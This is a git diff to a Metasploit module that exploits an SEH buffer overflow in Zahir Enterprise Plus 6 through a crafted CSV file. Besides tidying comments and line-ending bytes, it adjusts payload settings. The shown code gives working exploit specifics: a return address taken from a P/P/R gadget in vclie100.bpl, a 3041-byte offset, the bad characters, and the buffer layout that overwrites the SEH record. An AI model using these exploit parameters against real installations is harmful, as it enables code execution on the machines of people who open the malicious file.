diff --git a/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb b/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb index 4c9590d60b..65a722a1e5 100644 --- a/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb +++ b/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'f3ci', # found the vulnerability + 'f3ci', # found the vulnerability 'modpr0be' # Metasploit Module ], 'References' => @@ -34,7 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote [ 'Zahir Enterprise Plus 6 <=build 10b (7/8/10) Windows Universal', { - 'Ret' => 0x52016661, # P/P/R from vclie100.bpl (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl) + #P/P/R from vclie100.bpl (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl) + 'Ret' => 0x52016661, 'Offset' => 3041 } ] @@ -42,7 +43,9 @@ class MetasploitModule < Msf::Exploit::Remote 'Payload' => { 'Space' => 5000, - 'BadChars' => "\x00\x0a\x0d\x22\x2c" + 'BadChars' => "\x00\x0a\x0d\x22\x2c", + 'DisableNops' => true, + 'StackAdjustment' => -3500 }, 'Privileged' => false, 'DisclosureDate' => 'Sep 28 2018', @@ -57,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote def exploit buf = rand_text_alpha_upper(target['Offset']) - buf << "\n\r" # crash chars + buf << "\r\n" # crash chars buf << rand_text_alpha_upper(380) # extra chars to hit the offset buf << generate_seh_record(target.ret) buf << make_nops(12)